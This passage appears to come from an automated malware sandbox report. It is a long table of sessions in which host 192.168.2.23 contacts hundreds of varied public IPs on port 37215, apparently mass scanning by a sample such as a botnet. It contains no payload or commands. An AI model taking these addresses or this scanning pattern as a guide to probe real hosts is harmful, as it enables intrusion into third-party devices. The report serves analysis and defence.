                                          6523192.168.2.234628641.193.53.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6524192.168.2.234940041.141.240.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6525192.168.2.2351588157.34.250.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6526192.168.2.2359194157.99.91.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6527192.168.2.2359362157.92.152.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6528192.168.2.2337364157.210.13.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6529192.168.2.23346825.81.140.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6530192.168.2.2351698157.245.136.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6531192.168.2.233926241.88.171.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6532192.168.2.2359766157.14.178.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6533192.168.2.233804038.239.131.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6534192.168.2.2349934197.209.45.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6535192.168.2.233418089.74.204.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6536192.168.2.2340548157.66.194.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6537192.168.2.235908041.30.231.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6538192.168.2.2336542197.66.203.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6539192.168.2.2353012157.20.64.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6540192.168.2.2334140197.124.213.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6541192.168.2.2350932157.34.89.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6542192.168.2.235799290.51.11.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6543192.168.2.2349968157.189.144.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6544192.168.2.2343094157.69.165.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6545192.168.2.2344708102.63.21.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6546192.168.2.234974641.53.173.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6547192.168.2.2343058197.128.138.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6548192.168.2.235860079.20.40.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6549192.168.2.2345560157.208.5.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6550192.168.2.235165841.37.181.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6551192.168.2.236003841.10.25.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6552192.168.2.2355380197.185.74.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6553192.168.2.234328641.132.236.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6554192.168.2.2359626157.130.127.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6555192.168.2.235187241.42.37.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6556192.168.2.234555692.70.122.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6557192.168.2.2338136197.3.227.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6558192.168.2.2349590157.139.1.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6559192.168.2.2340374197.151.43.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6560192.168.2.2340738197.210.204.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6561192.168.2.2348874116.41.88.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6562192.168.2.235032890.74.36.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6563192.168.2.2338992157.205.219.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6564192.168.2.2333326197.167.172.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6565192.168.2.235466041.185.193.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6566192.168.2.2344444197.230.52.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6567192.168.2.2358954197.22.30.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6568192.168.2.234942041.197.244.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6569192.168.2.2335566197.7.126.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6570192.168.2.2359068197.225.33.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6571192.168.2.2358408157.118.55.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6572192.168.2.2356062144.66.76.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6573192.168.2.2337474104.131.12.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6574192.168.2.2354304197.188.231.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6575192.168.2.233428241.95.14.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6576192.168.2.2358238197.196.160.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6577192.168.2.235801441.166.209.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6578192.168.2.2354436197.248.184.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6579192.168.2.2347004157.234.45.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6580192.168.2.234298641.53.38.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6581192.168.2.2335604197.220.81.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6582192.168.2.233297441.222.186.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6583192.168.2.233337041.251.20.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6584192.168.2.2344298157.75.14.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6585192.168.2.233390096.30.67.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6586192.168.2.2346456145.182.84.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6587192.168.2.234640241.56.235.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6588192.168.2.2357330157.224.50.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6589192.168.2.234907641.101.24.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6590192.168.2.234363638.113.246.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6591192.168.2.2351138184.81.124.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6592192.168.2.2334554157.160.102.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6593192.168.2.2336362157.50.25.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6594192.168.2.234518437.171.29.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6595192.168.2.2345662157.236.74.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6596192.168.2.235101641.254.56.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6597192.168.2.2333394197.140.187.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6598192.168.2.236080241.85.31.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6599192.168.2.2334896157.0.230.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6600192.168.2.235315241.29.163.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6601192.168.2.2360470197.75.255.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6602192.168.2.2360728114.234.248.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6603192.168.2.2358124197.220.220.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6604192.168.2.2334224197.21.243.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6605192.168.2.2357370157.141.25.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6606192.168.2.2351470197.83.167.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6607192.168.2.2348024157.233.120.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6608192.168.2.236020641.24.41.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6609192.168.2.2334072157.189.78.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6610192.168.2.2357306157.172.174.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6611192.168.2.2359146197.203.84.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6612192.168.2.2357488197.150.69.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6613192.168.2.234675841.137.251.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6614192.168.2.235548841.241.250.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6615192.168.2.235015064.221.165.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6616192.168.2.2342178157.3.153.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6617192.168.2.2356154157.129.8.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6618192.168.2.2360258157.88.89.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6619192.168.2.2339798197.170.199.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6620192.168.2.2335902157.108.50.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6621192.168.2.2336812197.155.158.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6622192.168.2.2346320197.210.68.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6623192.168.2.233675841.16.160.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6624192.168.2.2347978154.111.154.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6625192.168.2.2355968157.201.39.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6626192.168.2.2344096197.56.43.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6627192.168.2.2334646197.229.4.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6628192.168.2.2345498157.223.156.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6629192.168.2.235523641.41.7.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6630192.168.2.2359064124.84.73.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6631192.168.2.2333076157.211.51.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6632192.168.2.235027841.85.64.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6633192.168.2.236078841.210.3.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6634192.168.2.2359304108.231.249.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6635192.168.2.235253641.136.130.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6636192.168.2.2352240157.1.229.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6637192.168.2.2355632157.193.13.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6638192.168.2.2336744157.172.82.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6639192.168.2.2340352172.182.116.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6640192.168.2.2337526157.196.214.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6641192.168.2.234206241.126.162.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6642192.168.2.235542641.46.91.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6643192.168.2.2348724157.208.87.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6644192.168.2.2337826197.136.98.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6645192.168.2.2357230157.161.225.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6646192.168.2.2353264200.255.169.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6647192.168.2.236001441.188.255.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6648192.168.2.2358868178.104.190.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6649192.168.2.2339628157.44.98.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6650192.168.2.2360180157.134.27.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6651192.168.2.233936041.159.58.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6652192.168.2.2346024197.180.52.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6653192.168.2.2335220157.211.75.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6654192.168.2.2360726157.137.176.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6655192.168.2.235862420.179.215.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6656192.168.2.2345130197.16.67.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6657192.168.2.235432441.208.25.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6658192.168.2.2344292157.207.34.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6659192.168.2.2357526116.126.3.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6660192.168.2.2345142157.4.124.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6661192.168.2.2340210197.112.15.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6662192.168.2.2345182197.229.226.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6663192.168.2.235411241.49.201.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6664192.168.2.2347716197.82.4.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6665192.168.2.2348718197.32.8.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6666192.168.2.233844488.106.186.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6667192.168.2.2359454197.181.79.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6668192.168.2.2352522157.122.140.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6669192.168.2.2349640157.236.190.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6670192.168.2.234942641.249.173.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6671192.168.2.2336358197.108.204.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6672192.168.2.2340384157.63.153.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6673192.168.2.235116435.15.0.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6674192.168.2.2342560197.24.218.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6675192.168.2.2333380197.236.216.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6676192.168.2.2350052197.106.192.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6677192.168.2.2347430157.113.247.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6678192.168.2.235821241.225.44.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6679192.168.2.2346906157.153.233.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6680192.168.2.2337990197.118.4.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6681192.168.2.235478866.66.168.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6682192.168.2.233982841.115.73.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6683192.168.2.2337672157.46.252.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6684192.168.2.2350736157.150.46.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6685192.168.2.234566641.122.152.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6686192.168.2.2356062197.200.47.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6687192.168.2.235227641.232.246.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6688192.168.2.2360168157.191.50.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6689192.168.2.2346590186.253.232.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6690192.168.2.2342712157.245.189.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6691192.168.2.2341002157.240.186.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6692192.168.2.2353304121.159.217.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6693192.168.2.2343722157.75.173.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6694192.168.2.2359974157.239.62.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6695192.168.2.233482641.20.160.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6696192.168.2.234386841.9.154.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6697192.168.2.235623641.213.240.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6698192.168.2.2349122182.170.175.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6699192.168.2.2351170157.106.6.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6700192.168.2.234857041.234.140.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6701192.168.2.2354392197.120.234.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6702192.168.2.234759241.94.56.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6703192.168.2.2333396197.194.225.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6704192.168.2.2352864133.70.60.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6705192.168.2.2338876157.71.48.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6706192.168.2.2344172157.144.54.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6707192.168.2.2348700157.44.60.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6708192.168.2.235669441.236.245.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6709192.168.2.236034241.183.40.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6710192.168.2.233882041.77.165.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6711192.168.2.2355040157.129.196.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6712192.168.2.2334520197.47.99.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6713192.168.2.233779841.209.61.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6714192.168.2.2347342197.61.69.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6715192.168.2.234803841.180.69.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6716192.168.2.2341986213.36.234.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6717192.168.2.2353860126.176.40.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6718192.168.2.2335382157.225.155.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6719192.168.2.2359616157.11.226.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6720192.168.2.235419841.206.135.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6721192.168.2.2340394157.153.191.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6722192.168.2.2349680157.137.102.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6723192.168.2.2348346149.137.187.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6724192.168.2.2346060197.207.55.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6725192.168.2.234544841.44.1.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6726192.168.2.235655641.201.57.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6727192.168.2.235095641.244.51.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6728192.168.2.2359358157.118.212.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6729192.168.2.233481212.139.72.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6730192.168.2.2350848147.81.102.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6731192.168.2.2358990191.80.203.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6732192.168.2.234445841.15.82.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6733192.168.2.2351380197.180.63.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6734192.168.2.2355342141.194.51.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6735192.168.2.2348714197.5.81.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6736192.168.2.2345454157.222.18.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6737192.168.2.235586240.118.185.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6738192.168.2.233560441.0.11.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6739192.168.2.2357218151.149.76.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6740192.168.2.2356094182.190.154.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6741192.168.2.235144041.214.198.22037215
